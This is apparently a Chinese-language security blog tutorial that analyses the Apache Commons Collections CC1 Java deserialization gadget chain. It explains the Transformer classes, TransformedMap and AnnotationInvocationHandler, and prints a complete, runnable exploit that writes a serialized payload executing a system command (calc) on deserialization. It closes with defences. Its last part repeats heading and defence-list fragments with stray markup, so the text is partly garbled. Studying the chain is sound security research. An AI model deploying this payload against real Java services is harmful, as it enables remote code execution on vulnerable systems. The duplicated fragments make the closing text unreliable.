Apache Commons Collections CC1链分析与利用<\/h1>

前言<\/h2>
Apache Commons Collections是一个由Apache软件基金会提供的开源Java库，它为Java标准集合API提供了丰富的扩展和补充。在Java安全领域中，CC链(Commons Collections链)是必须学习的内容，本文详细分析CC1链的构造原理和利用方式。<\/p>

环境准备<\/h2>

Commons Collections版本：<= 3.2.1<\/li>

JDK版本：< 8u71（推荐使用8u66）<\/li> <\/ul>

Maven依赖配置：<\/p>

<dependency><\/span>
<\/span><\/span>    <groupId><\/span>commons-collections<\/groupId><\/span>
<\/span><\/span>    <artifactId><\/span>commons-collections<\/artifactId><\/span>
<\/span><\/span>    <version><\/span>3.2.1<\/version><\/span>
<\/span><\/span><\/dependency><\/span>
<\/span><\/span><\/code><\/pre>关键组件分析<\/h2>
Transformer接口<\/h3>
漏洞的起点是Transformer<\/code>接口，它定义了一个transform<\/code>抽象方法。我们需要关注几个实现了该接口的关键类：<\/p>
1. ConstantTransformer<\/h3>
构造方法<\/strong>：<\/p>

将传入对象赋予给成员属性iConstant<\/code><\/li>
<\/ul>
transform方法<\/strong>：<\/p>

直接返回iConstant<\/code>的值，忽略传入参数<\/li>
<\/ul>
2. ChainedTransformer<\/h3>
构造方法<\/strong>：<\/p>

传入一个Transformer<\/code>类型数组，赋值给成员属性iTransformers<\/code><\/li>
<\/ul>
transform方法<\/strong>：<\/p>

遍历Transformer<\/code>数组<\/li>
将前一个transform<\/code>方法的返回值作为下一个transform<\/code>方法的输入参数<\/li>
循环执行直到数组遍历完成<\/li>
<\/ul>
3. InvokerTransformer<\/h3>
构造方法<\/strong>：<\/p>

传入三个参数：

iMethodName<\/code>：方法名<\/li>
iParamTypes<\/code>：参数类型数组<\/li>
iArgs<\/code>：参数值数组<\/li>
<\/ul>
<\/li>
<\/ul>
transform方法<\/strong>：<\/p>

通过反射获取传入对象的类<\/li>
获取指定方法（由iMethodName<\/code>控制）<\/li>
使用指定参数类型（由iParamTypes<\/code>控制）<\/li>
执行方法并传入参数（由iArgs<\/code>控制）<\/li>
<\/ul>
命令执行构造<\/h2>
利用上述三个类可以构造命令执行链：<\/p>
import<\/span> org.apache.commons.collections.functors.InvokerTransformer;<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> test1<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> {<\/span>
<\/span><\/span>        new<\/span> InvokerTransformer(<\/span>"exec"<\/span>,<\/span> 
<\/span><\/span>            new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span> 
<\/span><\/span>            new<\/span> Object[]{<\/span>"calc"<\/span>})<\/span>
<\/span><\/span>        .<\/span>transform<\/span>(<\/span>Runtime.<\/span>getRuntime<\/span>());<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>等效的反射代码：<\/p>
import<\/span> java.lang.reflect.*;<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> test<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        Runtime runtime =<\/span> Runtime.<\/span>getRuntime<\/span>();<\/span>
<\/span><\/span>        Class<?<\/span> extends<\/span> Runtime><\/span> aClass =<\/span> runtime.<\/span>getClass<\/span>();<\/span>
<\/span><\/span>        Method exec =<\/span> aClass.<\/span>getMethod<\/span>(<\/span>"exec"<\/span>,<\/span> String.<\/span>class<\/span>);<\/span>
<\/span><\/span>        exec.<\/span>invoke<\/span>(<\/span>runtime,<\/span>"calc"<\/span>);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>完整链构造<\/h2>
构造完整的Transformer链：<\/p>
Transformer[]<\/span> transformers =<\/span> new<\/span> Transformer[]{<\/span>
<\/span><\/span>    new<\/span> ConstantTransformer(<\/span>Runtime.<\/span>class<\/span>),<\/span> \/\/ 获取Runtime类
<\/span><\/span><\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"getMethod"<\/span>,<\/span> 
<\/span><\/span>        new<\/span> Class[]{<\/span>String.<\/span>class<\/span>,<\/span>Class[].<\/span>class<\/span>},<\/span> 
<\/span><\/span>        new<\/span> Object[]{<\/span>"getRuntime"<\/span>,<\/span>null<\/span>}),<\/span> \/\/ 获取getRuntime方法
<\/span><\/span><\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"invoke"<\/span>,<\/span> 
<\/span><\/span>        new<\/span> Class[]{<\/span>Object.<\/span>class<\/span>,<\/span> Object[].<\/span>class<\/span>},<\/span> 
<\/span><\/span>        new<\/span> Object[]{<\/span>null<\/span>,<\/span> null<\/span>}),<\/span> \/\/ 调用getRuntime()
<\/span><\/span><\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"exec"<\/span>,<\/span> 
<\/span><\/span>        new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span> 
<\/span><\/span>        new<\/span> Object[]{<\/span>"calc"<\/span>})<\/span> \/\/ 执行calc命令
<\/span><\/span><\/span><\/span>};<\/span>
<\/span><\/span>ChainedTransformer chainedTransformer =<\/span> new<\/span> ChainedTransformer(<\/span>transformers);<\/span>
<\/span><\/span><\/code><\/pre>执行流程：<\/p>

获取Runtime字节码<\/li>
获取getRuntime方法<\/li>
调用getRuntime()获取Runtime实例<\/li>
执行exec("calc")命令<\/li>
<\/ol>
触发点分析<\/h2>
TransformedMap<\/h3>
TransformedMap<\/code>的构造方法是private的，但可以通过decorate<\/code>方法创建实例：<\/p>
Map decorate<\/span>(<\/span>Map map,<\/span> Transformer keyTransformer,<\/span> Transformer valueTransformer)<\/span>
<\/span><\/span><\/code><\/pre>checkSetValue<\/code>方法会调用传入的Transformer<\/code>的transform<\/code>方法。<\/p>
AnnotationInvocationHandler<\/h3>
AnnotationInvocationHandler<\/code>实现了Serializable<\/code>接口，是反序列化的入口点。其readObject<\/code>方法会调用setValue<\/code>，进而触发checkSetValue<\/code>。<\/p>
关键点：<\/p>

构造方法第一个参数type<\/code>需要设置为Target.class<\/code><\/li>
Map中的key需要设置为"value"以绕过检查<\/li>
<\/ul>
完整利用代码<\/h2>
import<\/span> org.apache.commons.collections.Transformer;<\/span>
<\/span><\/span>import<\/span> org.apache.commons.collections.functors.*;<\/span>
<\/span><\/span>import<\/span> org.apache.commons.collections.map.TransformedMap;<\/span>
<\/span><\/span>import<\/span> java.io.*;<\/span>
<\/span><\/span>import<\/span> java.lang.annotation.Target;<\/span>
<\/span><\/span>import<\/span> java.lang.reflect.Constructor;<\/span>
<\/span><\/span>import<\/span> java.util.HashMap;<\/span>
<\/span><\/span>import<\/span> java.util.Map;<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> cctest<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> serialize<\/span>(<\/span>Object obj)<\/span> throws<\/span> IOException {<\/span>
<\/span><\/span>        FileOutputStream fos =<\/span> new<\/span> FileOutputStream(<\/span>"cc1.bin"<\/span>);<\/span>
<\/span><\/span>        ObjectOutputStream oos =<\/span> new<\/span> ObjectOutputStream(<\/span>fos);<\/span>
<\/span><\/span>        oos.<\/span>writeObject<\/span>(<\/span>obj);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    public<\/span> static<\/span> void<\/span> deserialize<\/span>(<\/span>String filename)<\/span> throws<\/span> IOException,<\/span> ClassNotFoundException {<\/span>
<\/span><\/span>        FileInputStream fis =<\/span> new<\/span> FileInputStream(<\/span>filename);<\/span>
<\/span><\/span>        ObjectInputStream ois =<\/span> new<\/span> ObjectInputStream(<\/span>fis);<\/span>
<\/span><\/span>        ois.<\/span>readObject<\/span>();<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        Transformer[]<\/span> transformers =<\/span> new<\/span> Transformer[]{<\/span>
<\/span><\/span>            new<\/span> ConstantTransformer(<\/span>Runtime.<\/span>class<\/span>),<\/span>
<\/span><\/span>            new<\/span> InvokerTransformer(<\/span>"getMethod"<\/span>,<\/span>
<\/span><\/span>                new<\/span> Class[]{<\/span>String.<\/span>class<\/span>,<\/span>Class[].<\/span>class<\/span>},<\/span>
<\/span><\/span>                new<\/span> Object[]{<\/span>"getRuntime"<\/span>,<\/span>null<\/span>}),<\/span>
<\/span><\/span>            new<\/span> InvokerTransformer(<\/span>"invoke"<\/span>,<\/span>
<\/span><\/span>                new<\/span> Class[]{<\/span>Object.<\/span>class<\/span>,<\/span> Object[].<\/span>class<\/span>},<\/span>
<\/span><\/span>                new<\/span> Object[]{<\/span>null<\/span>,<\/span> null<\/span>}),<\/span>
<\/span><\/span>            new<\/span> InvokerTransformer(<\/span>"exec"<\/span>,<\/span>
<\/span><\/span>                new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span>
<\/span><\/span>                new<\/span> Object[]{<\/span>"calc"<\/span>})<\/span>
<\/span><\/span>        };<\/span>
<\/span><\/span>        
<\/span><\/span>        ChainedTransformer chainedTransformer =<\/span> new<\/span> ChainedTransformer(<\/span>transformers);<\/span>
<\/span><\/span>        HashMap<<\/span>Object,<\/span> Object><\/span> map =<\/span> new<\/span> HashMap<>();<\/span>
<\/span><\/span>        map.<\/span>put<\/span>(<\/span>"value"<\/span>,<\/span>"1"<\/span>);<\/span>
<\/span><\/span>        
<\/span><\/span>        Map<<\/span>Object,<\/span> Object><\/span> decorate =<\/span> TransformedMap.<\/span>decorate<\/span>(<\/span>map,<\/span> null<\/span>,<\/span> chainedTransformer);<\/span>
<\/span><\/span>        
<\/span><\/span>        Class c =<\/span> Class.<\/span>forName<\/span>(<\/span>"sun.reflect.annotation.AnnotationInvocationHandler"<\/span>);<\/span>
<\/span><\/span>        Constructor constructor =<\/span> c.<\/span>getDeclaredConstructor<\/span>(<\/span>Class.<\/span>class<\/span>,<\/span> Map.<\/span>class<\/span>);<\/span>
<\/span><\/span>        constructor.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        Object o =<\/span> constructor.<\/span>newInstance<\/span>(<\/span>Target.<\/span>class<\/span>,<\/span> decorate);<\/span>
<\/span><\/span>        
<\/span><\/span>        serialize(<\/span>o);<\/span>
<\/span><\/span>        deserialize(<\/span>"cc1.bin"<\/span>);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>利用链总结<\/h2>

反序列化AnnotationInvocationHandler<\/code>对象<\/li>
触发readObject<\/code>方法<\/li>
调用TransformedMap<\/code>的setValue<\/code>方法<\/li>
触发checkSetValue<\/code>方法<\/li>
调用ChainedTransformer<\/code>的transform<\/code>方法<\/li>
依次执行ConstantTransformer<\/code>和InvokerTransformer<\/code>链<\/li>
最终通过反射执行命令<\/li>
<\/ol>
注意事项<\/h2>

JDK版本必须低于8u71，高版本有修复<\/li>
AnnotationInvocationHandler<\/code>是sun包下的类，不同JDK实现可能不同<\/li>
构造Map时需要设置key为"value"以绕过检查<\/li>
<\/ol>
防御措施<\/h2>

升级Commons Collections到安全版本<\/li>
升级JDK到8u71及以上版本<\/li>
对反序列化操作进行严格管控<\/li>
使用安全管理器限制危险操作<\/li>
<\/ol>

Apache Commons Collections CC1链分析与利用<\/h1>

关键组件分析<\/h2>

Transformer接口<\/h3> 漏洞的起点是Transformer<\/code>接口，它定义了一个transform<\/code>抽象方法。我们需要关注几个实现了该接口的关键类：<\/p>

触发点分析<\/h2>

防御措施<\/h2> 升级Commons Collections到安全版本<\/li> 升级JDK到8u71及以上版本<\/li> 对反序列化操作进行严格管控<\/li> 使用安全管理器限制危险操作<\/li> <\/ol>

Transformer接口<\/h3>
漏洞的起点是`Transformer<\/code>接口，它定义了一个transform<\/code>抽象方法。我们需要关注几个实现了该接口的关键类：<\/p>`

防御措施<\/h2>

升级Commons Collections到安全版本<\/li>
升级JDK到8u71及以上版本<\/li>
对反序列化操作进行严格管控<\/li>
使用安全管理器限制危险操作<\/li> <\/ol>